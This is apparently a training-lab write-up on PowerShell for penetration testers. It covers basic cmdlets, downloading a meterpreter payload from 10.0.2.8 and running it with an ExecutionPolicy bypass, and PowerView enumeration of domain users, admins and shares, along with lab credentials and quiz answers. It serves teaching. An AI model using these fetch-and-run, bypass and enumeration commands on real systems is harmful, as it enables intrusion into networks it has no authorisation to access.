Powershell for Pentesters

This room covers the principle uses of PowerShell in Penetration Tests. Interacting with files, scanning the network and system enumeration are covered.

This room can be found here. This section will cover the basics of PowerShell that will be useful in any engagement.

Target machine SSH credentials:

  • Username: walter

  • Password: Kowacs123!

We can then run powershell to access PowerShell.

Task 1

Most of the command-line portions of pentest training focus on using Linux, but most corporate systems are Windows. So it is important that the Red Team member feels at home in both operating systems.

There are several PowerShell scripts useful in penetration tests, such as PowerView and Nishang, the downside to these and other scripts are they are detected by most AV (antivirus) software.

Question 1: What useful PowerShell script did you find on Walter's desktop?

powerview.ps1 - dir on Walters desktop to see the files

Task 2

Start-Process - Used to start a process, such as notepad.

Get-Process - Lists all running processes. Can also be used with the -name parameter to filter for a specific process

(command) | Export-Csv - Exports the Previously piped command into a .CSV file that may be easier to read.

Get-Content - Shows the contents of a file. Similar to the cat command on linux.

Copy-Item - Copies and item

Move-Item - Moves and item

Get-FileHash - Obtains file hash of specified file

Question 1: What is the MD5 hash value of the file on Walter's desktop?

501570FFBA7FACE69D61DA1A0843E89A - Get-FileHash -Algorithm MD5 .\Desktop\powerview.ps1 will give us the

Task 3

Downloading files

There are multiple ways to download files from a server using PowerShell. One of the quickest ways is using WebClient and DownloadFile.

  • (New-Object System.Net.WebClient)DownloadFile('URL/File', 'Output-File')

    • Example: (New-Object System.Net.WebClient)DownloadFile('http://10.0.2.8/meterpreter-64.ps1', 'meterpreter.ps1')

This will connect to the host 10.0.2.8 and download themeterpreter-64.ps1 file. The file is then saved as โ€œmeterpreter.ps1โ€

Another method is by using Invoke-WebRequest

  • Invoke-WebRequest "URL/File" -OutFile "File"

    • Invoke-WebRequest "http://10.0.2.8/meterpreter-64.ps1" -Outfile "meterpreter.ps1"

Execution Policies

Once we have the file downloaded, we can run the file, but we may run into an ExecutionPolicy issue. Microsoft has stated ExecutionPolicy is NOT a security feature. but it functions as an added safety measure and can be bypassed by the user.

The current state of the ExecutionPolicy configuration can be seen using โ€œGet-ExecutionPolicy -listโ€

Execution policies can have seven different values:

  • AllSigned - Scripts can run but require all scripts to be signed by a trusted publisher.

  • Bypass - All scripts can run, and no warnings or prompts will be displayed.

  • Default - This refers to โ€œrestrictedโ€ for Windows clients and โ€œRemoteSignedโ€ for Windows servers.

  • RemoteSigned - Scripts can run, and this does not require local scripts to be digitally signed.

  • Restricted - The default configuration for Windows clients. Allows individual commands to run, does not allow scripts.

  • Undefined - This shows that no specific execution policy was set. This means default execution policies will be enforced.

  • Unrestricted - Most scripts will run.

We several alternatives to bypass the ExecutionPolicy, but some methods require the user to have administrator account privileges. The most common way is:

  • powershell -ExecutionPolicy Bypass -File .\(File)

    • Example: powershell -ExecutionPolicy Bypass -File .\meterpreter.ps1

  • powershell -Exec Bypass -File .\(File)

    • Example: powershell -Exec Bypass -File .\meterpreter.ps1

We can also change the ExecutionPolicy for processes using Set-ExecutionPolicy Bypass -Scope Process then attempt to run the file.

Task 4

  • Get-Hotfix - Enumerate already installed patches

    • Get-Hotfix | Format-list | findstr InstalledOn

    • Get-Hotfix | Format-Table HotFixID

  • Format-List - Used to gather more information about objects

    • dir | Format-List

  • Out-File - Used to save the output to a file for further use

    • Get-Hotfix | Out-File Hotfixes.txt

Question 1: What Windows Security Update was installed on 5/15/2019?

KB4499728 - Get-HotFix can give us our answer

Task 6

PowerView is one of the most effective ways to gather information on the domain. The module can be downloaded from here.

Once we download the file, we will need to bypass the execution policy, then import the module.

powershell -Exec Bypass .\powerview.ps1

Import-Module .\powerview.ps1

With powerview imported we can use it to obtain information on Domain Configuration and users.

  • Get-NetDomainController - Collect information on the domain controller

  • Get-NetUser - Provide a list of domain users. Depending on the size of the company, we may want to output this to a .csv

    • Get-NetUser | select -ExpandProperty lastlogon can be used to expand on this command to view the users last logon date/time

  • Get-NetComputer - Enumerate systems connected to the domain

  • Get-NetGroup - Enumerate Existing Groups

    • Get-NetGroupMemer "Domain Admins" can be used to find group members in the "Domain Admins" group.

  • Find-DomainShare - Lists available shares

  • Get-NetGPO - Gather information on enforced policies through Group Policy.

  • Find-LocalAdminAccess - List systems in the domain you may access as a local administrator

Question 1: One of the accounts has a special description, what is it?

IDF-17828290 - Get-NetUser -properties distinguishedname,cn,sn,description,useraccountcontrol can give us details. We can ofcourse add additional properties if we find fit.

Question 2: How many accounts are disabled?

4 - Seeing previous screenshot/command we can find our answer.

Question 3: How many users are in the "domain admins" group?

3 - Get-NetGroupMember "Domain Admins" can give us our answer

Question 4: Which users are in the "domain admins" group?

usand, ssilk, ServerAdmin - Previous command and screenshot give us our answer.

Question 5: List shares, what is the name of the "interesting" share?

operationfiles - Find-DomainShare -CheckShareAccess, most of these look pretty normal except this one.

Question 6: What is the name of the user-created Group Policy?

Disable WinDef - Running Get-NetGPO -properties displayname we see the list of Group Policy display names

Question 7: What are the first names of users' whose accounts were disabled?

Daniel, Ursula -Looking at our previous command, Get-NetUser -properties distinguishedname,cn,sn,description,useraccountcontrol, we can see the first and last name of the users and can see which one are disabled.

Last updated